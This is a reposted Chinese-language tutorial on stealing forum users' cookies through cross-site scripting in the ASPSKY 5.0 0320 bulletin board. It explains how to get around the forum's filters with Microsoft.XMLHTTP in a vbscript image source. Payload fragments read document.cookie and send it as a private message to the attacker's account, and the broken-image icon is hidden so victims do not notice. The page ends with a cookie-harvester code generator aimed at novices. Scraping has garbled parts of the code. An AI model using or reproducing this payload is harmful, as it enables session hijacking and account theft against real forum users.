萬盛學電腦網

 萬盛學電腦網 >> 應用技巧 >> 利用Microsoft.XMLHTTP控件發送COOKIE

利用Microsoft.XMLHTTP控件發送COOKIE

(注意由於論壇會對文章中的一些字符作處理,所以最好到
http://www.chinansl.com/czy/xmlhttp.txt看文章
http://www.chinansl.com/czy/aspsky5.htm測試代碼)


跨站腳本攻擊想必各位都已經是很熟悉了,但是得到COOKIE的時候一直有一個
問題:總是要用WINDOW.OPEN彈一個窗體出來然後發送COOKIE,這樣隱秘性
就大打折扣了。以前我想了一個在網頁中用insertAdjacentHTML方法來注入HTML語句
的辦法勉強可以作到發送COOKIE不出現IE窗口,但是在實際使用中有時會遇到IE出錯。


沒有更好的辦法了嗎?以前在研究VBS病毒自動升級的時候用到一個Microsoft.XMLHTTP
控件(該控件是WIN98/2K上都默認自帶的東東,並且它是IE認為safe的控件!),通過它我們
可以在網頁中給網站發送http請求,可以是POST也可以是GET.


好了思路已經到這兒來,下面我們可以實戰一下,我以ASPSKY 5.0 0320為例子。
我們知道在SRC中可以寫入vbscript:這樣的語句。。比如
,但是我們只能執行一個語句,比如
這樣都將是錯誤的!
怎麼辦法呢?在VBS中我們可以用EXECUTE語句,在JS中我們可以使用EVAL語!
比如:
或是


還沒有暈吧?上面你可能會注意到用VBS的execute語句時雙引號要換為"這是因為:
在VBS中單引號要括起字符串,必須是兩個單引號代表一個又引號,並且在雙引號內!
所以在execute語句中我們不能用單引號,而直接用"呢,在HTML進行引號匹配的時候
會和src="後的引號匹配,所以我們只能用"代替了。


引號的問題解決了,在實際應用中ASPSKY還會對我們的代碼進行處理:
1:如果發現script字串,會在前面加上一個空格
2:如果發現http字串會認為是一個URL,並在兩邊加上元素
3:如果發現空格會用 代替


解決問題:
1:vbscript用vbsCript代替
2:http用,""ht""+""tp...代替(vbs中引號括引號裡面的應用多一對,+代表連接符)
3:空格用 代替(注不是)


在最後就是發送COOKIE的問題:
1:控件在本地可以GET,POST任意的網站,但是在網頁中竟然只能
GET,POST當前服務器。。。。要不然IE就會說拒絕仿問!
2:cookie中不能有&等在URL中有特殊交意的字符


解決問題:


1:只能發給當前服務器,那麼可以把COOKIE發到你在論壇上的注冊的用戶的郵箱嘛:)
2:replace(document.cookie,""&"",""-""),在vbs中用
replace替換函用,在例子中我把"&"換成了"-"


問題都解決了下面是實際的例子:
動網aspsky 5.0 0320測試成功


//----------------------


yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=發送&message=""&dat,false:http.send")" target=_blank>yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=發送&message=""&dat,false:http.send")" border=0 alt=按此在新窗口浏覽圖片 onload='javascript:if(this.width>screen.width-300)this.width=screen.width-300'>


說明:把COOKIE發給CZY用戶,郵件標題叫news
//----------------------



另控件的正常用法:




讓代碼更完美,現在COOKIE已經乖乖的在我們的郵箱裡了,但是有一個小問題由於圖片不
能正常的顯示會是一個小叉,旁邊還有按此在新窗口浏覽圖片的提示。。。這又難免會讓人
生疑。


解決思路:
一個網頁中的所有IMG元素通過document.imanges都能例舉到,並且可以設置它們的大小,
當width=0時就相當於HIDDEN了.
通過比較元素的src屬性的值是否含有"ript"就可以判斷是不是我們的圖片.
另外比較時大於符用>代替,0用0代替!


代碼:
0
then:aa.width=0:end if:next")" target=_blank>0
then:aa.width=0:end if:next")" border=0 alt=按此在新窗口浏覽圖片 onload='javascript:if(this.width>screen.width-300)this.width=screen.width-300'>



實際應用的代碼:
0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yan
qing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=發送&message=""&dat,false:http.send")" target=_blank>0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yan
qing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=發送&message=""&dat,false:http.send")" border=0 alt=按此在新窗口浏覽圖片 onload='javascript:if(this.width>screen.width-300)this.width=screen.width-300'>



//-------------------方便菜鳥使用:)



ASPSKY 5.0 0320 COOKI搜集器--CZY


設置發送地址:

▲發送地址形如:www.nnit30.com/newbbs(newbbs是網站中論壇的安裝目錄最後不用加/,也
不要http://頭)

發送的用戶名:-------------


生成的代碼:)


copyright © 萬盛學電腦網 all rights reserved